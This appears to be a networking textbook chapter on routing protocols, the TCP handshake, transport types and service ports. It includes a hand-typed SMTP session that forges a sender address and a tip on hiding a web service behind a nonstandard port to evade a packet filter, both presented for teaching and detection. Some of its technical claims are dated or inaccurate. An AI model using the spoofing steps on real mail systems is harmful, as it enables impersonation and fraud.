Warning: Keep in mind that in a large network, convergence time can be quite long, as RIP updates are only sent once or twice per minute.

Distance Vector Routing Problems

It's important to note that our distance vector routing table has been almost completely built on secondhand information. Any route that a router reports with a hop count greater than 1 is based upon what it has learned from another router. When Router B tells Router A that it can reach Network 5 in two hops or Network 6 in three, it is fully trusting the accuracy of the information it has received from Router D. If, as a child, you ever played the telephone game (where each person in a line receives a whispered message and tries to convey it exactly to the next), you quickly realized that secondhand information is not always as accurate as it appears to be.

Figure 3.8 shows a pretty simple network layout. It consists of four logical networks separated by three routers. Once the point of convergence is reached, each router will have created a routing table, as shown in the diagram.

Figure 3.8: Given the diagrammed network, each router would construct its routing table.

Now, let's assume that Router C dies a fiery death and drops offline.
This will make Network 4 unreachable by all other network segments. Once Router B realizes that Router C is offline, it will review the RIP information it has received in the past, looking for an alternate route. This is where distance vector routing starts to break down. Because Router A has been advertising that it can get to Network 4 in three hops, Router B simply adds 1 to this value and assumes it can now reach Network 4 through Router A. Relying on secondhand information clearly causes problems: Router B cannot reach Network 4 through Router A now that Router C is offline.

As you can see in Figure 3.9, Router B would now begin to advertise that it can reach Network 4 in four hops. Remember that RIP frames do not identify how a router will get to a remote network, only that it can and how many hops it will take to get there. Without knowing how Router A plans to reach Network 4, Router B has no idea that Router A is basing its route information on the tables it originally received from Router B.

So Router A would receive a RIP update from Router B and see that Router B has increased the hop count to Network 4 from two to four. Router A would then adjust its table accordingly and begin to advertise that it now takes five hops to reach Network 4. It would send another RIP update, and Router B would again increase the hop count to Network 4 by one.

Figure 3.9: Router B incorrectly believes that it can now reach Network 4 through Router A and updates its tables accordingly.

Note: This phenomenon is called count to infinity, because both routers would continue to increase their hop counts forever. Because of this problem, distance vector routing limits the maximum hop count to 15. Any route that is 16 or more hops away is considered unreachable and is subsequently removed from the routing table. This allows our two routers to figure out in a reasonable amount of time that Network 4 can no longer be reached.

Reasonable is a subjective term, however. Remember that RIP updates are only sent out once or twice per minute. This means that it may be a minute or more before our routers buy a clue and realize that Network 4 is gone. With a technology that measures frame transmissions in the microsecond range, a minute or more is plenty of time to wreak havoc on communications. For example, let's look at what is taking place on Network 2 while the routers are trying to converge.

Once Router C has dropped offline, Router B assumes that it has an alternative route to Network 4 through Router A. Any packets it receives are checked for errors and passed along to Router A. When Router A receives the frame, it performs an error check again. It then references its tables and concludes it needs to forward the frame to Router B in order to reach Network 4. Router B would again receive the frame and send it back to Router A.

This is called a routing loop. Each router plays hot potato with the frame, assuming the other is responsible for its delivery and passing it back and forth. While our example describes only one frame, imagine the amount of bandwidth lost if there is a considerable amount of traffic destined for Network 4. With all these frames looping between the two routers, there would be very little bandwidth available on Network 2 for any other systems that may need to transmit information.
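If you want to watch the count to infinity play out, the following toy Python simulation runs the exchange between Routers A and B described above. The starting hop counts match the example; everything else is a simplification:

INFINITY = 16          # RIP treats 16 hops as unreachable

hops_a = 3             # Router A's advertised distance to Network 4
hops_b = 2             # Router B's old (now dead) distance to Network 4

update = 0
while hops_a < INFINITY and hops_b < INFINITY:
    update += 1
    hops_b = hops_a + 1    # B trusts A's advertisement and adds 1
    hops_a = hops_b + 1    # A hears B's new table and adds 1 again
    print(f"update {update}: A says {hops_a} hops, B says {hops_b} hops")

print("Network 4 is finally marked unreachable.")

Seven rounds of updates pass before either router gives up on the route, and remember that each round may be separated by 30 seconds or more of real time.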
Fortunately, the network layer has a method for eliminating this problem as well. As each router handles the frame, it is required to decrease a hop counter within the frame by 1. The hop counter is responsible for recording how many routers the information has crossed. As with RIP frames, this counter has a maximum value of 15. When the information is handled for the 16th time (the counter has dropped to 0), the router realizes that the information is undeliverable and simply drops it.

While this 16-hop limitation is not a problem for the average corporate network, it can be a severe limitation in larger networks. For example, consider the vast size of the Internet. If RIP were used throughout the Internet, certain areas of the Internet could not reach many resources.

Security Concerns with RIP

Besides our RIP routing tables being built upon secondhand information, note that this information is never actually verified. For example, if Router B claims to have the best route to a given network, none of the other routers will verify this information. In fact, they do not even verify that this information was sent from Router B, or that Router B even exists!

Needless to say, this lack of verification can be a gaping security hole. It is not all that difficult to propagate bogus routing information and bring an entire network to its knees. This is a clear example of how one savvy but malicious user can interrupt communications for an entire network.

Because of this security concern and the other problems we've noted, many organizations use static routing or have deployed link state routing protocols such as OSPF (Open Shortest Path First). Besides eliminating many of the convergence problems found in RIP, OSPF also brings authentication to the table, requiring routers to supply a password in order to participate in routing updates. While not infallible, this method dramatically increases the security in a dynamic routing environment.

Link State Routing

Link state routers function in a fashion similar to distance vector, but with a few notable exceptions. Most importantly, link state routers use only firsthand information when developing their routing tables. Not only does this help to eliminate routing errors, it drops the time to convergence to nearly zero. Imagine that our network from Figure 3.7 has been upgraded to use a link state routing protocol. Now let's bring Router A online and watch what happens.

Propagating Network Information with Link State

As Router A powers up, it sends out a routing maintenance packet referred to as a hello. The hello packet is simply an introduction that states, "Greetings! I am a new router on this network; is there anybody out there?" This packet is transmitted on both of its ports and will be responded to by Routers B and C.

Once Router A receives a reply from Routers B and C, it creates a link state protocol (LSP) frame and transmits it to Routers B and C. An LSP frame is a routing maintenance frame that contains the following information:

• The router's name or identification
• The networks it is attached to
• The hop count or cost of getting to each network
• Any other routers on each network that responded to its hello frame

Routers B and C would then make a copy of Router A's LSP frame and forward the frame in its entirety along through the network. Each router receiving Router A's LSP frame would then copy the information and pass it along.
With link state routing, each router maintains a copy of every other router's LSP frame. The router can use this information to diagram the network and thus build routing tables. Because each LSP frame contains only the route information that is local to the router that sent it, this network map is created strictly from firsthand information. A router simply fits the LSP puzzle pieces together until its network picture is complete.

Router A would then make an LSP frame request of either Router B or C. An LSP frame request is a query asking the router to forward a copy of all known LSP frames. Because each router has a copy of all LSP frames, either router is capable of supplying a copy from every router on the network. This avoids making Router A request this information from each router individually, thus saving bandwidth. Once an LSP network is up and running, updates are only transmitted every two hours or whenever a change takes place (such as a router going offline).

Convergence Time with Link State

Our link state network is up and running. Note that Routers B and C were not required to recompute their routing tables. They simply added the new piece from Router A and continued to pass traffic. This is why convergence time is nearly zero. The only change required of each router is to add the new piece to its tables. Unlike distance vector, updates were not required in order to normalize the routing table. Router B did not need a second packet from Router A telling it what networks were available through Router C. Router B simply added Router A's LSP information to its existing table and was already aware of those links.

Recovering from a Router Failure in a Link State Environment

Let's revisit Figure 3.9 to look at how link state routing reacts when a router goes offline. Again, for the purpose of this example, let's assume that our routing protocol has been upgraded from distance vector to link state. Let's also assume that our routing tables have been created and that traffic is passing normally.

If Router C is shut down normally, it will transmit a maintenance frame (known as a dying gasp) to Router B, informing it that it is about to go offline. Router B would then delete the copy of Router C's LSP frame that it has been maintaining and forward this information along to Router A. Both routers now have a valid copy of the new network layout and realize that Network 4 is no longer reachable. If Router C is not brought down gracefully but again dies a fiery death, there would be a short delay before Router B notices that Router C is no longer acknowledging packets sent to it and concludes that Router C is offline. It would then delete Router C's LSP frame from its table and forward the change along to Router A. Again, both systems have a valid copy of the new network layout. Because we are dealing with strictly firsthand information, there are none of the pesky count-to-infinity problems that we experienced with distance vector. Our router tables are accurate, and our network is functioning with a minimal amount of updating. This allows link state to traverse a larger number of network segments. The maximum is 127 hops, but this can be fewer, depending on the implementation.
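To see how firsthand LSP information becomes a routing table, consider the following Python sketch. It uses the topology from Figure 3.8 and a simple breadth-first walk; a real link state router stores far more per LSP and typically runs a shortest-path-first calculation, so treat this strictly as an illustration of the idea:

from collections import deque

# lsp_database maps each router to the networks its LSP says it touches
# (Router A sits on Networks 1 and 2, B on 2 and 3, C on 3 and 4).
lsp_database = {
    "A": {"1", "2"},
    "B": {"2", "3"},
    "C": {"3", "4"},
}

def routing_table(start):
    # Directly attached networks are 1 hop, matching the book's convention.
    table = {net: 1 for net in lsp_database[start]}
    visited = {start}
    queue = deque([(start, 1)])
    while queue:
        router, hops = queue.popleft()
        for other, nets in lsp_database.items():
            # Two routers are neighbors if their LSPs share a network.
            if other not in visited and nets & lsp_database[router]:
                visited.add(other)
                for net in nets:
                    table.setdefault(net, hops + 1)
                queue.append((other, hops + 1))
    return table

print(routing_table("A"))  # Networks 1 and 2 at 1 hop, 3 at 2 hops, 4 at 3 hops

When Router C's LSP is deleted from the database, rerunning the walk immediately shows Network 4 missing; no counting is involved.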
Security with Link State Routing

Most link state routing protocols support some level of authentication of the source of dynamic route updates. While it is not impossible to incorporate this functionality into distance vector routing, most distance vector routing protocols predate the need to authenticate routing table updates. Authentication is an excellent means of insuring that each router only accepts routing table updates from a trusted host. While authentication is not 100 percent secure, it is a far cry from trusting every host on the wire.

For example, OSPF supports two levels of authentication: password and message digest. Password authentication requires each router that will be exchanging route table information to be preprogrammed with a password. When a router attempts to send OSPF routing information to another router, it includes the password string as verification. Routers using OSPF will not accept route table updates unless the password string is included in the transmission. This helps to insure that table updates are only accepted from trusted hosts.

The drawback to this authentication method is that the password is transmitted as clear text. This means that an attacker who is monitoring the network with a packet analyzer can capture the OSPF table updates and discover the password. An attacker who knows the password can use it to pose as a trusted OSPF router and transmit bogus routing table information.

Message digest is far more secure in that it does not exchange password information over the wire. Each OSPF router is programmed with a password and a key-ID. Prior to transmitting an OSPF table update, a router will process the OSPF table information, password, and key-ID through an algorithm in order to generate a unique message digest, which is attached to the end of the packet. The message digest provides an encrypted method of verifying that the router transmitting the table can be considered a trusted host. When the destination router receives the transmission, it uses the password and key-ID it has been programmed with to validate the message digest. If the message is authentic, the routing table update is accepted.

Tip: While it is possible to crack the encryption used by OSPF, doing so takes time and lots of processing power. This makes OSPF with message digest authentication an excellent choice for updating dynamic routing information over insecure networks.
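The message digest exchange can be illustrated with Python's standard hashlib module. This sketch is a simplification (the real OSPF packet layout, key handling, and replay protection are more involved), but it shows why a captured update does not reveal the password and why a tampered update fails verification:

import hashlib

# SHARED_KEY and KEY_ID stand in for the values both routers would be
# preprogrammed with; the names and packet layout are illustrative.
SHARED_KEY = b"s3cret-key"
KEY_ID = 5

def sign_update(update):
    # Hash the routing data together with the secret; append key-ID + digest.
    digest = hashlib.md5(update + SHARED_KEY).digest()
    return update + bytes([KEY_ID]) + digest

def verify_update(message):
    # Recompute the digest with our own copy of the secret and compare.
    update, key_id, digest = message[:-17], message[-17], message[-16:]
    if key_id != KEY_ID:
        return False                      # signed with a key we don't know
    return hashlib.md5(update + SHARED_KEY).digest() == digest

signed = sign_update(b"net 10.1.0.0/16 metric 2")
print(verify_update(signed))              # True: accepted
print(verify_update(b"X" + signed[1:]))   # False: update was tampered with

Note that only the digest crosses the wire, never the password itself, so a packet analyzer capturing the update learns nothing it can reuse.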
Connectionless and Connection-Oriented Communications

We can now get our information from Point A to Point B, regardless of whether the systems are located on the same logical network. This raises the question, "Once we get there, how do we carry on a proper conversation?" This is where the transport layer comes in.

The transport layer is where we begin to set down the rules of communication etiquette. It's not enough that we can get this information from one system to another; we also have to insure that both systems are operating at the same level of decorum.

As an analogy, let's say you pull up to the finest restaurant in the city in your AMC Pacer and proceed to the front door sporting your best set of leather chaps, Harley jacket, and bandanna. Once inside, you greet the maitre d' with "Yo wimp, gimme a table and some grub, NOW!" Surprisingly, you're escorted out of the restaurant at gunpoint. What went wrong? Why, you employed improper etiquette, of course: everyone knows the correct term is not "grub" but "escargot."

You can avoid such verbal breakdowns, as well as their networking equivalents, by insuring that all parties involved are communicating at the same level of etiquette. There are two forms of network communication etiquette:

• Connection-oriented
• Connectionless

Connection-Oriented Communications

A connection-oriented communication exchanges control information, referred to as a handshake, prior to transmitting data. The transport layer uses the handshake to insure that the destination system is ready to receive information. A connection-oriented exchange will also insure that data is transmitted and received in its original order.

Modems are heavy users of connection-oriented communications, as they need to negotiate a connection speed prior to sending any information. In networking, this functionality is accomplished through the use of a transport layer field referred to as a flag in the IP and AppleTalk world, or as a connection control field under IPX. Only connection-oriented communications use these fields. When IP is the underlying routing protocol, TCP is used to create connection-oriented communications. IPX uses SPX, and AppleTalk uses ATP to provide this functionality.

As a communication session is started, the application layer (not necessarily the program you are using) will specify whether it needs to use a connection-oriented protocol. Telnet is just such an application. When a telnet session is started, the application layer will request TCP as its transport service in order to better insure the reliability of the connection. Let's look at how this session is established to see how a handshake works.

The TCP Three-Packet Handshake

At your workstation you type in telnet thor.foobar.com to establish a remote connection to that system. As the request is passed down through the transport layer, TCP is selected to connect the two systems so that a connection-oriented communication can be established. The transport layer sets the synchronization (SYN) flag to 1 and leaves all other flags at 0. IP uses multiple flag fields, each set using binary values, so the only possible values of an IP flag are 1 and 0. IPX and AppleTalk use a hexadecimal value, as their frames contain only one flag field; this allows the one field to hold more than two values.

By setting SYN to 1 and all other fields to 0, we let the system on the other end (thor.foobar.com) know that we wish to establish a new communication session. This request is passed down the remaining layers, across the wire to the remote system, and then up through its OSI layers.

If the service is available on the remote system (more on services in a moment), the request is acknowledged and sent back down the stack until it reaches the transport layer. The transport layer then sets the SYN flag to 1, as the originating system did, but it also sets the acknowledgment (ACK) flag to 1. This lets the originating system know that its transmission was received and that it's OK to send data. The request is then passed down the stack and over the wire back to the original system.

The original system then sets the SYN flag to 0 and the ACK flag to 1 and transfers this frame back to Thor. This lets Thor know, "I'm acknowledging your acknowledgment, and I'm about to send data." At this point, data would be transferred, with each system being required to transmit an acknowledgment for each packet it receives.
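Since the flag settings are the whole story here, a tiny Python sketch makes the sequence easy to see at a glance. The system names and flag dictionaries are illustrative; real TCP carries these values as bits inside the segment header:

def send(source, destination, flags):
    print(f"{source} -> {destination}: SYN={flags['SYN']} ACK={flags['ACK']}")

send("loki", "thor", {"SYN": 1, "ACK": 0})  # packet 1: request a new session
send("thor", "loki", {"SYN": 1, "ACK": 1})  # packet 2: acknowledge, ready for data
send("loki", "thor", {"SYN": 0, "ACK": 1})  # packet 3: acknowledge the acknowledgment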
Figure 3.10 shows a telnet session from the system Loki to the system Thor. Each line represents a different frame that has been transmitted from one system to the other. Source and destination systems are identified, as well as some summary information about the frame. Notice that the first three frames are identified as TCP frames, not telnet, and that they perform the handshaking just described. Once TCP establishes the connection-oriented session, telnet can step in to transfer the data required. The TCP frames that appear later in the conversation are for acknowledgment purposes. As stated, with a connection-oriented protocol, every frame must be acknowledged. If the frame was a request for information, the reply can be in the form of delivering the requested information. If a frame is sent that does not require a reply, however, the destination system is still required to acknowledge that the frame was received.

Figure 3.10: An example of a connection-oriented communication

If you're still a bit fuzzy on handshaking and connection-oriented communications, let's look at an analogy. Let's say you call a friend to inform him you'll be having a network Quake party on Saturday night and that he should come by with his laptop. You follow these steps:

• You dial your friend's phone number (SYN=1, ACK=0).
• Your friend answers the phone and says, "Hello" (SYN=1, ACK=1).
• You reply by saying, "Hi, Fred, this is Dave" (SYN=0, ACK=1).

You would then proceed to transfer your data about your upcoming party. Every time you pause, Fred would either transfer back information ("Yes, I'm free Saturday night.") or send some form of acknowledgment (ACK) to let you know he has not yet hung up.

When the conversation is complete, you would both tear down the connection by saying goodbye, which is a handshake to let each other know that the conversation is complete and that it's OK to hang up the phone. Once you hang up, your connection-oriented communication session is complete.

The purpose of connection-oriented communications is simple: they provide a reliable communication session when the underlying layers may be considered less than stable. Insuring reliable connectivity at the transport layer helps to speed up communication when data becomes lost, because the data does not have to be passed all the way up to the application layer before a retransmission frame is created and sent. While this is important in modem communications, where a small amount of noise or a crossed line can kill a communication session, it is not as useful with network-based communication. TCP and SPX originate from the days when the physical and data-link layers could not always be relied on to transmit information successfully. These days this is less of a concern, because reliability has increased dramatically since the earlier years of networking.

Connectionless Communications

A connectionless protocol does not require an initial handshake or acknowledgments to be sent for every packet.
When you use a connectionless transport, it makes its best effort to deliver the data but relies on the stability of the underlying layers, as well as application layer acknowledgments, to insure that the data is delivered reliably. IP's User Datagram Protocol (UDP) and IPX's NetWare Core Protocol (NCP) are examples of connectionless transports. Both protocols rely on connectionless communications to transfer routing and server information as well. While AppleTalk does not utilize connectionless communication for creating data sessions, it does use it when advertising servers with its name binding protocol (NBP). Broadcasts are always transmitted using a connectionless transport.

As an example of connectionless communications, check out the network file system (NFS) session in Figure 3.11. NFS is a service that allows file sharing over IP. It uses UDP as its underlying transport protocol. Notice that all data acknowledgments are in the form of a request for additional information. The destination system (Thor) assumes that the last packet was received if the source system (Loki) requests additional information. Conversely, if Loki does not receive a reply from Thor, NFS takes care of requesting the information again. As long as we have a stable connection that does not require a large number of retransmissions, allowing NFS to provide error correction is a very efficient method of communicating, because it does not generate unnecessary acknowledgments.

Figure 3.11: NFS uses UDP to create a connectionless session.

Let's look at another analogy to see how this type of communication differs from the connection-oriented one described earlier. Again, let's say you call Fred to invite him and his laptop to your network Quake party on Saturday night. You call Fred's number, but this time you get his answering machine. You leave a detailed message indicating when the party will take place and what he should bring. Unlike the first call, which Fred answered, you are now relying on

• Your ability to dial the correct phone number, as you did not reach your friend to confirm that this number was in fact his
• The fact that the phone company did not drop your phone connection in the middle of your message (answering machines do not ACK, unless, of course, you talk until the beep cuts you off)
• The answering machine's proper recording of the message, without eating the tape
• The ability of Fred's cat to discern between the tape and a ball of yarn
• The absence of a power failure (which would cause the machine to lose the message)
• Fred's retrieval of this message between now and the date of the party

As you can see, you have no real confirmation that your friend will actually receive the message. You are counting on the power company, the answering machine, and so on, to enable Fred to get your message in a timely manner. If you wanted to insure the reliability of this data transmission, you could send an application layer acknowledgment request in the form of "Please RSVP by Thursday." If you did not get a response by then, you could try transmitting the data again.

So, which is a better transport to use: connectionless or connection-oriented? Unfortunately, the answer is whichever one your application layer specifies. If telnet wants TCP, you cannot force it to use UDP.
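The two forms of etiquette map directly onto the standard socket API, as the following Python sketch shows. The host name and ports are illustrative (thor.foobar.com will not resolve on your network), and the retry loop stands in for the application layer acknowledgments that a protocol like NFS provides:

import socket

# Connection-oriented: connect() performs the TCP three-packet handshake
# before any application data moves.
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.settimeout(2.0)
try:
    tcp.connect(("thor.foobar.com", 23))  # the handshake happens here
except OSError:
    pass                                  # host unreachable in this sketch
finally:
    tcp.close()

# Connectionless: sendto() just transmits; there is no handshake and no
# transport-level ACK. Reliability, if needed, is the application's job.
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.settimeout(2.0)
try:
    for attempt in range(3):              # application-layer retries
        try:
            udp.sendto(b"request", ("thor.foobar.com", 2049))
            reply, sender = udp.recvfrom(1024)
            break                         # got an answer; stop retrying
        except OSError:
            continue                      # no reply; transmit the data again
finally:
    udp.close()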
Security Implications

One technology that has made good use of the flag field in connection-oriented communications is the firewall. A firewall will use the information in the flag field to determine whether a connection is inbound or outbound and, based on its rule table, either accept or deny the connection.

For example, let's say our firewall rules allow internal users access to the Internet but block external users from accessing internal systems. This is a pretty common security policy. How do we accomplish this?

We cannot simply block all inbound traffic, because this would prohibit our internal users from ever receiving a reply to their data requests. We need some method of allowing replies back in while denying external systems the ability to establish connections with internal systems. The secret to this is our TCP flags.

Remember that a TCP-based session needs to handshake prior to sending data. If we block all inbound frames that have the SYN field set to 1 and all other fields set to 0, we can prevent any external user from establishing a connection with an internal system. Because these settings are only used during the initial handshake and do not appear in any other part of the transmission, this is an effective way of blocking external users. If external users cannot connect to an internal system, they cannot transmit data to or pull data from that system.

Note: Many firewalls will deny all UDP connections, because UDP does not have a flag field, and most firewalls have no effective way of determining whether the data is a connection request or a reply. This is what has made dynamic packet filtering firewalls so popular: they monitor and remember all connection sessions. With dynamic packet filtering you can create a filter rule that accepts UDP packets from an external host only when that host has been previously queried for information using UDP. This insures that only UDP replies are allowed back in past the firewall. While a packet filter or some proxy firewalls can only effectively work with TCP connections, a dynamic packet filtering firewall can safely pass UDP as well.
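The filtering decision just described boils down to a few lines of logic. Here is a minimal Python sketch of such a rule; the packet representation is invented for illustration, and a real firewall obviously inspects the raw header bits rather than dictionaries:

def allow_inbound(packet):
    flags = packet["flags"]
    others = any(v == 1 for name, v in flags.items() if name != "SYN")
    if flags.get("SYN") == 1 and not others:
        return False    # opening packet of an external handshake: block it
    return True         # everything else (SYN+ACK, ACK, data) passes

print(allow_inbound({"flags": {"SYN": 1, "ACK": 0}}))  # False: new inbound session
print(allow_inbound({"flags": {"SYN": 1, "ACK": 1}}))  # True: reply to our SYN
print(allow_inbound({"flags": {"SYN": 0, "ACK": 1}}))  # True: established traffic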
Network Services

We can now find our remote system and insure that both systems are using the same level of communications. Now, how do we tell the server what we want? While computers are powerful tools, capable of processing many requests per second, they still have a problem with the phrase, "You know what I mean?" This is why we need a way to let a system know exactly what we want from it. It would be a real bummer to connect to a slick new Web site only to have the server start spewing e-mail or routing information at you because it had no idea which of its data you were looking for. To make sure the computer knows what you want from it, you need to look to the session layer.

Note: You may remember from our discussion of the session layer that it is the layer responsible for insuring that requests for service are formulated properly.

A service is a process or application that runs on a server and provides some benefit to a network user. E-mail is a good example of a value-added service. A system may queue your mail messages until you connect to the system with a mail client in order to read them. File and print sharing are two other common examples of network services.

Services are accessed by connecting to a specific port or socket. Think of ports as virtual mail slots on the system and you'll get the idea. A separate mail slot (port number) is designated for each service or application running on the system. When a user wishes to access a service, the session layer is responsible for insuring that the request reaches the correct mail slot or port number.

On a UNIX or NT system, IP port numbers are mapped to services in a file called (oddly enough) services. An abbreviated version of a services file is shown in Table 3.6. The first column identifies the service by name, while the second column identifies the port and transport to be used. The third column is a brief description of the functionality provided by the service. Table 3.6 is only a brief listing of IP services; more information can be found in Request for Comments (RFC) 1700.

Table 3.6: An Abbreviated Services File

Name of Service   Port and Transport   Functionality
ftp-data          20/tcp               Used to transfer actual file information
ftp               21/tcp               Used to transfer session commands
telnet            23/tcp               Creates a remote session
smtp              25/tcp               E-mail delivery
whois             43/tcp               InterNIC domain name lookup
domain            53/tcp               Domain name queries
domain            53/udp               DNS zone transfers
bootps            67/udp               bootp server
bootpc            68/udp               bootp client
pop3              110/tcp              Post Office V.3
nntp              119/tcp              Network News Transfer
ntp               123/tcp              Network Time Protocol
ntp               123/udp              Network Time Protocol
netbios-ns        137/tcp              nbns
netbios-ns        137/udp              nbns
netbios-dgm       138/tcp              nbdgm
netbios-dgm       138/udp              nbdgm
netbios-ssn       139/tcp              nbssn
snmp              161/udp              Simple Network Management Protocol
snmp-trap         162/udp              Simple Network Management Protocol

Note: These port numbers are not UNIX-specific. For example, any operating system using SMTP should use port 25.

According to the file summarized in Table 3.6, any TCP request received on port 23 is assumed to be a telnet session and is passed up to the application that handles remote access. If the requested port is 25, it is assumed that mail services are required, and the session is passed up to the mail program.

The file in Table 3.6 is used on UNIX systems by a process called the Internet daemon (inetd). Inetd monitors each of the listed ports on a UNIX system and is responsible for waking up the application that provides services to that port. This is an efficient means of managing the system for infrequently accessed ports: the process is only active and using system resources (memory, CPU time, and so on) when the service is actually needed. When the service is shut down, the process returns to a sleep mode, waiting for inetd to call on it again.

Applications that receive heavy use should be left running in a constant listening mode. For example, Web server access usually uses port 80. Note that it is not listed in the services file in Table 3.6 as a process to be handled by inetd. This is because a Web server may be called upon to service many requests in the course of a day. It is more efficient to leave the process running all the time than to bother inetd every time you receive a page request.
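Incidentally, programs do not need to hard-code these numbers: the standard socket library consults the same services mapping directly, as this short Python example shows (the results depend on the services file installed on your system):

import socket

print(socket.getservbyname("telnet", "tcp"))  # 23
print(socket.getservbyname("smtp", "tcp"))    # 25
print(socket.getservbyname("domain", "udp"))  # 53
print(socket.getservbyport(80, "tcp"))        # 'http' on most systems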
All of these port numbers are referred to as well-known ports. Well-known ports are de facto standards used to insure that everyone can access services on other machines without needing to guess which port number is used by the service. For example, there is nothing stopping you from setting up a Web server on port 573, provided that the port is not in use by some other service. The problem is that most users will expect the service to be available on port 80 and may be unable to find it. Sometimes, however, switching ports may be done on purpose—we will look at that in just a minute.

Note: De facto standard means that it is a standard by popularity; it is not a rule or law.

Ports 0–1023 are defined by the Internet Assigned Numbers Authority (IANA) for most well-known services. While ports have been assigned up to 7200, the ports below 1024 make up the bulk of Internet communications. These assignments are not hard-and-fast rules; rather, they are guides to insure that everyone offers public services on the same port. For example, if you want to access Microsoft's Web page you can assume it offers the service on port 80, because this is the well-known port for that service.

When a system requests information, it not only specifies the port it wishes to access but also which port should be used when returning the requested information. Port numbers for this task are selected from 1024 to 65535 and are referred to as upper port numbers.

To illustrate how this works, let's revisit our telnet session in Figure 3.10. When Loki attempts to set up a telnet session with Thor, it will do so by accessing port 23 on Thor (port 23 is the well-known service port for telnet). If we look at frame number 2, we see that Thor is sending the acknowledgment (ACK) back on port 1042. This is because the session information in the original frame that Loki sent Thor specified a source port of 1042 and a destination port of 23. The destination port identified where the frame was going (port 23 on Thor), while the source port identified which port should be used when sending replies (port 1042 on Loki). Port 23 is our well-known service port, while port 1042 is our upper port number used for the reply.

Upper reply ports are assigned on the fly. It is nearly impossible to predict which upper port a system will request information to be received on, as the ports are assigned based on availability. It is for this reason that packet filters used for firewalling purposes are sometimes incorrectly set up to leave all ports above 1023 open all the time in order to accept replies.

This leads to one of the reasons why a port other than a well-known port may be used to offer a service. A savvy end user who realizes that a packet filter will block access to the Web server running on her system may assign the service to some upper port number like 8001. Because the connection will be made above port 1023, it may not be blocked. The result is that despite your corporate policy banning internal Web sites and a packet filter to help enforce it, this user can successfully advertise her Web site provided she supplies the port number (8001) along with the uniform resource locator (URL). The URL would look similar to this:

http://thor.foobar.com:8001

The :8001 tells your Web browser to access the server using port 8001 instead of 80. Because most packet filters have poor logging facilities, the network administrator responsible for enforcing the policy of "no internal Web sites" would probably never realize the site exists unless he stumbles across it.
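You can watch an upper port being assigned by opening a connection and asking the operating system which source port it picked. Here is a short Python sketch; thor.foobar.com is the example host used throughout this chapter, so substitute a host you can actually reach:

import socket

# Connect to the well-known telnet port and report the upper port the
# OS assigned for replies. The number varies from session to session.
s = socket.create_connection(('thor.foobar.com', 23))
address, port = s.getsockname()
print('Replies will be sent to upper port', port)  # e.g., 1042
s.close()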
Tip: The next time your boss accuses you of wasting time by cruising the Web, correct her by replying, "I am performing a security audit by attempting to pursue links to renegade internal sites which do not conform to our corporate security policy. This activity is required due to inefficiencies in our firewalling mechanism." If you're not fired on the spot, quickly submit a PO for a new firewall while the event is fresh in the boss' mind.

Speaking of switching port numbers, try to identify the session in Figure 3.12. While the session is identified as Simple Mail Transfer Protocol (SMTP), it is actually a telnet session redirected to port 25 (the well-known port for SMTP). We've fooled the analyzer recording this session into thinking that we simply have one mail system transferring mail to another. Most firewalls will be duped in the same fashion because they use the destination port to identify the session in progress—they do not look at the actual applications involved. A typical use of this trick is spoofing, or faking, a mail message. Once I've connected to the remote mail system, I'm free to pretend the message came from anywhere. Unless the routing information in the mail header is checked (most user-friendly mail programs simply discard this information), the actual origin of this information cannot be traced.

Figure 3.12: While this looks like a normal transfer of mail, it is actually someone spoofing a mail message to the destination system.

Such spoofing is what has made intrusion detection systems (IDS) so popular—they can be programmed to catch this type of activity. Look at Figure 3.12 again, but this time check out the frame size used by the transmitting system. Notice that the largest frame sent is 122 bytes. This indicates a telnet session, as telnet requires that each character typed be acknowledged. Had this been an actual mail system transferring data, we would have seen packet sizes closer to 1,500 bytes, because SMTP does not require that only a single character be sent in every frame. A good IDS can be tuned to identify such inconsistencies.

Figure 3.13 shows the final output of this spoofing session. Without the header information, I might actually believe this message came from bgates@microsoft.com. The fact that the message was never touched by a mail system within the Microsoft domain indicates that it is a phony. I've used this example in the past when instructing Internet and security classes. Do not believe everything you read, especially if it comes from the Internet!

Figure 3.13: The output from our spoofed mail message
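For the curious, the session captured in Figure 3.12 amounts to typing standard SMTP commands by hand. A hypothetical transcript looks something like the following; the host names are placeholders, and the numbered server responses vary from system to system:

telnet mail.foobar.com 25
220 mail.foobar.com ESMTP ready
HELO microsoft.com
250 mail.foobar.com
MAIL FROM:<bgates@microsoft.com>
250 OK
RCPT TO:<jdoe@foobar.com>
250 OK
DATA
354 End data with <CRLF>.<CRLF>
Subject: Free operating system upgrade

Do not believe everything you read.
.
250 OK: message accepted for delivery
QUIT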
Port numbers are also used to distinctly identify similar sessions between systems. For example, let's build on Figure 3.10. We already have one telnet session running from Loki to Thor. What happens if four or five more sessions are created? All sessions have the following information in common:

Source IP address: 10.2.2.20 (loki.foobar.com)
Destination IP address: 10.2.2.10 (thor.foobar.com)
Destination port: 23 (well-known port for telnet)

The source ports will be the only distinctive information that can be used to identify each individual session. Our first connection has already specified a source port of 1042 for its connection. Each sequential telnet session established after that would be assigned some other upper port number to uniquely identify it. The actual numbers assigned would be based upon what was not currently being used by the source system. For example, ports 1118, 1398, 4023, and 6025 may be used as source ports for the next four sessions. The actual reply port number does not really matter; what matters is that it can uniquely identify that specific session between the two systems. If we were to monitor a number of concurrent sessions taking place, the transaction would look similar to Figure 3.14. Now we see multiple reply ports in use to identify each session.

Figure 3.14: Multiple telnet sessions in progress between Loki and Thor

IP is not the only protocol to use ports. AppleTalk and IPX also use ports, which are referred to as sockets. Unlike IP and AppleTalk, which use decimal numbers to identify different ports, IPX uses hexadecimal numbers. Well-known and upper ports function the same with AppleTalk and IPX as they do with IP. AppleTalk and IPX simply do not have as many services defined.

File Transfer Protocol (FTP): The Special Case

In all of our examples so far, the source system would create a single service connection to the destination system when accessing a specific service. Unless multiple users requested this service, only a single connection session was required.

FTP is used to transfer file information from one system to another. FTP uses TCP as its transport and ports 20 and 21 for communication. Port 21 is used to transfer session information (username, password, commands), while port 20 is referred to as the data port and is used to transfer the actual file.

Figure 3.15 shows an FTP command session between two systems (Loki is connecting to Thor). Notice the three-packet TCP handshake at the beginning of the session, which was described in the discussion on connection-oriented communications earlier in this chapter. All communications use a destination port of 21, which is simply referred to as the FTP port. Port 1038 is the random upper port used by Loki when receiving replies. This connection was initiated by Loki at port 1038 to Thor at port 21.

Figure 3.15: An FTP command session between two systems

Figure 3.16 shows Loki initiating a file transfer from Thor. Lines 7, 8, and 9 show the TCP three-packet handshake. Lines 10 through 24 show the actual data transfer.

Figure 3.16: An FTP data session

